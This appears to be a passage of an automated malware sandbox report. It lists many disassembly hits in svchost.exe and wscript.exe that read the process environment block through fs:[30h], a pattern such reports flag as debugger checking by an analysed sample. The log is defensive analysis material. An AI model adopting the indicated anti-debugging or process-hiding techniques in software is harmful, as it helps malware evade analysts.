Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]	1_2_039E1C06
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]	1_2_039E1C06
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]	1_2_039E1C06
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]	1_2_039E1C06
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]	1_2_039E1C06
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]	1_2_039E1C06
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]	1_2_039E1C06
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]	1_2_039E1C06
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]	1_2_039E1C06
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]	1_2_039E1C06
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]	1_2_039E1C06
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]	1_2_039E1C06
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]	1_2_039E1C06
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395BC2C mov eax, dword ptr fs:[00000030h]	1_2_0395BC2C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039BC450 mov eax, dword ptr fs:[00000030h]	1_2_039BC450
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039BC450 mov eax, dword ptr fs:[00000030h]	1_2_039BC450
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395A44B mov eax, dword ptr fs:[00000030h]	1_2_0395A44B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0394746D mov eax, dword ptr fs:[00000030h]	1_2_0394746D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04869080 mov eax, dword ptr fs:[00000030h]	7_2_04869080
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048E3884 mov eax, dword ptr fs:[00000030h]	7_2_048E3884
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048E3884 mov eax, dword ptr fs:[00000030h]	7_2_048E3884
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0487849B mov eax, dword ptr fs:[00000030h]	7_2_0487849B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A90AF mov eax, dword ptr fs:[00000030h]	7_2_048A90AF
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048920A0 mov eax, dword ptr fs:[00000030h]	7_2_048920A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048920A0 mov eax, dword ptr fs:[00000030h]	7_2_048920A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048920A0 mov eax, dword ptr fs:[00000030h]	7_2_048920A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048920A0 mov eax, dword ptr fs:[00000030h]	7_2_048920A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048920A0 mov eax, dword ptr fs:[00000030h]	7_2_048920A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048920A0 mov eax, dword ptr fs:[00000030h]	7_2_048920A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0489F0BF mov ecx, dword ptr fs:[00000030h]	7_2_0489F0BF
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0489F0BF mov eax, dword ptr fs:[00000030h]	7_2_0489F0BF
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0489F0BF mov eax, dword ptr fs:[00000030h]	7_2_0489F0BF
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04938CD6 mov eax, dword ptr fs:[00000030h]	7_2_04938CD6
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048FB8D0 mov eax, dword ptr fs:[00000030h]	7_2_048FB8D0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048FB8D0 mov ecx, dword ptr fs:[00000030h]	7_2_048FB8D0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048FB8D0 mov eax, dword ptr fs:[00000030h]	7_2_048FB8D0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048FB8D0 mov eax, dword ptr fs:[00000030h]	7_2_048FB8D0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048FB8D0 mov eax, dword ptr fs:[00000030h]	7_2_048FB8D0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048FB8D0 mov eax, dword ptr fs:[00000030h]	7_2_048FB8D0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_049214FB mov eax, dword ptr fs:[00000030h]	7_2_049214FB
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048658EC mov eax, dword ptr fs:[00000030h]	7_2_048658EC
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048E6CF0 mov eax, dword ptr fs:[00000030h]	7_2_048E6CF0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048E6CF0 mov eax, dword ptr fs:[00000030h]	7_2_048E6CF0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048E6CF0 mov eax, dword ptr fs:[00000030h]	7_2_048E6CF0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048E6C0A mov eax, dword ptr fs:[00000030h]	7_2_048E6C0A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048E6C0A mov eax, dword ptr fs:[00000030h]	7_2_048E6C0A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048E6C0A mov eax, dword ptr fs:[00000030h]	7_2_048E6C0A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048E6C0A mov eax, dword ptr fs:[00000030h]	7_2_048E6C0A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04934015 mov eax, dword ptr fs:[00000030h]	7_2_04934015
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04934015 mov eax, dword ptr fs:[00000030h]	7_2_04934015
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]	7_2_04921C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]	7_2_04921C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]	7_2_04921C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]	7_2_04921C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]	7_2_04921C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]	7_2_04921C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]	7_2_04921C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]	7_2_04921C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]	7_2_04921C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]	7_2_04921C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]	7_2_04921C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]	7_2_04921C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]	7_2_04921C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]	7_2_04921C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048E7016 mov eax, dword ptr fs:[00000030h]	7_2_048E7016
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048E7016 mov eax, dword ptr fs:[00000030h]	7_2_048E7016
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048E7016 mov eax, dword ptr fs:[00000030h]	7_2_048E7016
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0493740D mov eax, dword ptr fs:[00000030h]	7_2_0493740D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0493740D mov eax, dword ptr fs:[00000030h]	7_2_0493740D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0493740D mov eax, dword ptr fs:[00000030h]	7_2_0493740D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0489002D mov eax, dword ptr fs:[00000030h]	7_2_0489002D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0489002D mov eax, dword ptr fs:[00000030h]	7_2_0489002D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0489002D mov eax, dword ptr fs:[00000030h]	7_2_0489002D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0489002D mov eax, dword ptr fs:[00000030h]	7_2_0489002D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0489002D mov eax, dword ptr fs:[00000030h]	7_2_0489002D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0489BC2C mov eax, dword ptr fs:[00000030h]	7_2_0489BC2C
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0487B02A mov eax, dword ptr fs:[00000030h]	7_2_0487B02A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0487B02A mov eax, dword ptr fs:[00000030h]	7_2_0487B02A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0487B02A mov eax, dword ptr fs:[00000030h]	7_2_0487B02A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0487B02A mov eax, dword ptr fs:[00000030h]	7_2_0487B02A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0489A44B mov eax, dword ptr fs:[00000030h]	7_2_0489A44B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04880050 mov eax, dword ptr fs:[00000030h]	7_2_04880050
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04880050 mov eax, dword ptr fs:[00000030h]	7_2_04880050
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048FC450 mov eax, dword ptr fs:[00000030h]	7_2_048FC450
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048FC450 mov eax, dword ptr fs:[00000030h]	7_2_048FC450
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04922073 mov eax, dword ptr fs:[00000030h]	7_2_04922073
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0488746D mov eax, dword ptr fs:[00000030h]	7_2_0488746D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04931074 mov eax, dword ptr fs:[00000030h]	7_2_04931074
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04892581 mov eax, dword ptr fs:[00000030h]	7_2_04892581
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04892581 mov eax, dword ptr fs:[00000030h]	7_2_04892581
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04892581 mov eax, dword ptr fs:[00000030h]	7_2_04892581
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04892581 mov eax, dword ptr fs:[00000030h]	7_2_04892581
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0488C182 mov eax, dword ptr fs:[00000030h]	7_2_0488C182
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0489A185 mov eax, dword ptr fs:[00000030h]	7_2_0489A185
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04862D8A mov eax, dword ptr fs:[00000030h]	7_2_04862D8A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04862D8A mov eax, dword ptr fs:[00000030h]	7_2_04862D8A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04862D8A mov eax, dword ptr fs:[00000030h]	7_2_04862D8A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04862D8A mov eax, dword ptr fs:[00000030h]	7_2_04862D8A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04862D8A mov eax, dword ptr fs:[00000030h]	7_2_04862D8A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0489FD9B mov eax, dword ptr fs:[00000030h]	7_2_0489FD9B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0489FD9B mov eax, dword ptr fs:[00000030h]	7_2_0489FD9B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04892990 mov eax, dword ptr fs:[00000030h]	7_2_04892990
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048935A1 mov eax, dword ptr fs:[00000030h]	7_2_048935A1
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048E69A6 mov eax, dword ptr fs:[00000030h]	7_2_048E69A6
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048961A0 mov eax, dword ptr fs:[00000030h]	7_2_048961A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048961A0 mov eax, dword ptr fs:[00000030h]	7_2_048961A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048E51BE mov eax, dword ptr fs:[00000030h]	7_2_048E51BE
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048E51BE mov eax, dword ptr fs:[00000030h]	7_2_048E51BE
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048E51BE mov eax, dword ptr fs:[00000030h]	7_2_048E51BE
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048E51BE mov eax, dword ptr fs:[00000030h]	7_2_048E51BE
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04891DB5 mov eax, dword ptr fs:[00000030h]	7_2_04891DB5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04891DB5 mov eax, dword ptr fs:[00000030h]	7_2_04891DB5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04891DB5 mov eax, dword ptr fs:[00000030h]	7_2_04891DB5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_049305AC mov eax, dword ptr fs:[00000030h]	7_2_049305AC
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_049305AC mov eax, dword ptr fs:[00000030h]	7_2_049305AC
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048E6DC9 mov eax, dword ptr fs:[00000030h]	7_2_048E6DC9
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048E6DC9 mov eax, dword ptr fs:[00000030h]	7_2_048E6DC9
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048E6DC9 mov eax, dword ptr fs:[00000030h]	7_2_048E6DC9
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048E6DC9 mov ecx, dword ptr fs:[00000030h]	7_2_048E6DC9
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048E6DC9 mov eax, dword ptr fs:[00000030h]	7_2_048E6DC9
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048E6DC9 mov eax, dword ptr fs:[00000030h]	7_2_048E6DC9
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04918DF1 mov eax, dword ptr fs:[00000030h]	7_2_04918DF1
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0486B1E1 mov eax, dword ptr fs:[00000030h]	7_2_0486B1E1
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0486B1E1 mov eax, dword ptr fs:[00000030h]	7_2_0486B1E1
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0486B1E1 mov eax, dword ptr fs:[00000030h]	7_2_0486B1E1
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048F41E8 mov eax, dword ptr fs:[00000030h]	7_2_048F41E8
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0487D5E0 mov eax, dword ptr fs:[00000030h]	7_2_0487D5E0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0487D5E0 mov eax, dword ptr fs:[00000030h]	7_2_0487D5E0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04869100 mov eax, dword ptr fs:[00000030h]	7_2_04869100
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04869100 mov eax, dword ptr fs:[00000030h]	7_2_04869100
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04869100 mov eax, dword ptr fs:[00000030h]	7_2_04869100
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04938D34 mov eax, dword ptr fs:[00000030h]	7_2_04938D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04884120 mov eax, dword ptr fs:[00000030h]	7_2_04884120
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04884120 mov eax, dword ptr fs:[00000030h]	7_2_04884120
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04884120 mov eax, dword ptr fs:[00000030h]	7_2_04884120
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04884120 mov eax, dword ptr fs:[00000030h]	7_2_04884120
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04884120 mov ecx, dword ptr fs:[00000030h]	7_2_04884120
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04894D3B mov eax, dword ptr fs:[00000030h]	7_2_04894D3B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04894D3B mov eax, dword ptr fs:[00000030h]	7_2_04894D3B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04894D3B mov eax, dword ptr fs:[00000030h]	7_2_04894D3B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0489513A mov eax, dword ptr fs:[00000030h]	7_2_0489513A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0489513A mov eax, dword ptr fs:[00000030h]	7_2_0489513A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04873D34 mov eax, dword ptr fs:[00000030h]	7_2_04873D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04873D34 mov eax, dword ptr fs:[00000030h]	7_2_04873D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04873D34 mov eax, dword ptr fs:[00000030h]	7_2_04873D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04873D34 mov eax, dword ptr fs:[00000030h]	7_2_04873D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04873D34 mov eax, dword ptr fs:[00000030h]	7_2_04873D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04873D34 mov eax, dword ptr fs:[00000030h]	7_2_04873D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04873D34 mov eax, dword ptr fs:[00000030h]	7_2_04873D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04873D34 mov eax, dword ptr fs:[00000030h]	7_2_04873D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04873D34 mov eax, dword ptr fs:[00000030h]	7_2_04873D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04873D34 mov eax, dword ptr fs:[00000030h]	7_2_04873D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04873D34 mov eax, dword ptr fs:[00000030h]	7_2_04873D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04873D34 mov eax, dword ptr fs:[00000030h]	7_2_04873D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04873D34 mov eax, dword ptr fs:[00000030h]	7_2_04873D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0486AD30 mov eax, dword ptr fs:[00000030h]	7_2_0486AD30
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048EA537 mov eax, dword ptr fs:[00000030h]	7_2_048EA537
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A3D43 mov eax, dword ptr fs:[00000030h]	7_2_048A3D43
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0488B944 mov eax, dword ptr fs:[00000030h]	7_2_0488B944
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0488B944 mov eax, dword ptr fs:[00000030h]	7_2_0488B944
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048E3540 mov eax, dword ptr fs:[00000030h]	7_2_048E3540
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04887D50 mov eax, dword ptr fs:[00000030h]	7_2_04887D50
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0486C962 mov eax, dword ptr fs:[00000030h]	7_2_0486C962
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0486B171 mov eax, dword ptr fs:[00000030h]	7_2_0486B171
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0486B171 mov eax, dword ptr fs:[00000030h]	7_2_0486B171
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0488C577 mov eax, dword ptr fs:[00000030h]	7_2_0488C577
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0488C577 mov eax, dword ptr fs:[00000030h]	7_2_0488C577
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048FFE87 mov eax, dword ptr fs:[00000030h]	7_2_048FFE87
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0489D294 mov eax, dword ptr fs:[00000030h]	7_2_0489D294
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0489D294 mov eax, dword ptr fs:[00000030h]	7_2_0489D294
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048652A5 mov eax, dword ptr fs:[00000030h]	7_2_048652A5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048652A5 mov eax, dword ptr fs:[00000030h]	7_2_048652A5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048652A5 mov eax, dword ptr fs:[00000030h]	7_2_048652A5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048652A5 mov eax, dword ptr fs:[00000030h]	7_2_048652A5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048652A5 mov eax, dword ptr fs:[00000030h]	7_2_048652A5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048E46A7 mov eax, dword ptr fs:[00000030h]	7_2_048E46A7
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04930EA5 mov eax, dword ptr fs:[00000030h]	7_2_04930EA5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04930EA5 mov eax, dword ptr fs:[00000030h]	7_2_04930EA5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04930EA5 mov eax, dword ptr fs:[00000030h]	7_2_04930EA5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0487AAB0 mov eax, dword ptr fs:[00000030h]	7_2_0487AAB0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0487AAB0 mov eax, dword ptr fs:[00000030h]	7_2_0487AAB0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0489FAB0 mov eax, dword ptr fs:[00000030h]	7_2_0489FAB0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04892ACB mov eax, dword ptr fs:[00000030h]	7_2_04892ACB
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04938ED6 mov eax, dword ptr fs:[00000030h]	7_2_04938ED6
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048936CC mov eax, dword ptr fs:[00000030h]	7_2_048936CC
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A8EC7 mov eax, dword ptr fs:[00000030h]	7_2_048A8EC7
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0491FEC0 mov eax, dword ptr fs:[00000030h]	7_2_0491FEC0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048776E2 mov eax, dword ptr fs:[00000030h]	7_2_048776E2
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048916E0 mov ecx, dword ptr fs:[00000030h]	7_2_048916E0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04892AE4 mov eax, dword ptr fs:[00000030h]	7_2_04892AE4
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0486C600 mov eax, dword ptr fs:[00000030h]	7_2_0486C600
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0486C600 mov eax, dword ptr fs:[00000030h]	7_2_0486C600
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0486C600 mov eax, dword ptr fs:[00000030h]	7_2_0486C600
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04898E00 mov eax, dword ptr fs:[00000030h]	7_2_04898E00
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04878A0A mov eax, dword ptr fs:[00000030h]	7_2_04878A0A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0486AA16 mov eax, dword ptr fs:[00000030h]	7_2_0486AA16
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0486AA16 mov eax, dword ptr fs:[00000030h]	7_2_0486AA16
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04883A1C mov eax, dword ptr fs:[00000030h]	7_2_04883A1C
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0489A61C mov eax, dword ptr fs:[00000030h]	7_2_0489A61C
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0489A61C mov eax, dword ptr fs:[00000030h]	7_2_0489A61C
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04865210 mov eax, dword ptr fs:[00000030h]	7_2_04865210
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04865210 mov ecx, dword ptr fs:[00000030h]	7_2_04865210
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04865210 mov eax, dword ptr fs:[00000030h]	7_2_04865210
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04865210 mov eax, dword ptr fs:[00000030h]	7_2_04865210
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04921608 mov eax, dword ptr fs:[00000030h]	7_2_04921608
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0486E620 mov eax, dword ptr fs:[00000030h]	7_2_0486E620
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A4A2C mov eax, dword ptr fs:[00000030h]	7_2_048A4A2C
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A4A2C mov eax, dword ptr fs:[00000030h]	7_2_048A4A2C
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0491FE3F mov eax, dword ptr fs:[00000030h]	7_2_0491FE3F
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04869240 mov eax, dword ptr fs:[00000030h]	7_2_04869240
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04869240 mov eax, dword ptr fs:[00000030h]	7_2_04869240
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04869240 mov eax, dword ptr fs:[00000030h]	7_2_04869240
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04869240 mov eax, dword ptr fs:[00000030h]	7_2_04869240
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04877E41 mov eax, dword ptr fs:[00000030h]	7_2_04877E41
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04877E41 mov eax, dword ptr fs:[00000030h]	7_2_04877E41
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04877E41 mov eax, dword ptr fs:[00000030h]	7_2_04877E41
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04877E41 mov eax, dword ptr fs:[00000030h]	7_2_04877E41
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04877E41 mov eax, dword ptr fs:[00000030h]	7_2_04877E41
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04877E41 mov eax, dword ptr fs:[00000030h]	7_2_04877E41
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048F4257 mov eax, dword ptr fs:[00000030h]	7_2_048F4257
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0487766D mov eax, dword ptr fs:[00000030h]	7_2_0487766D
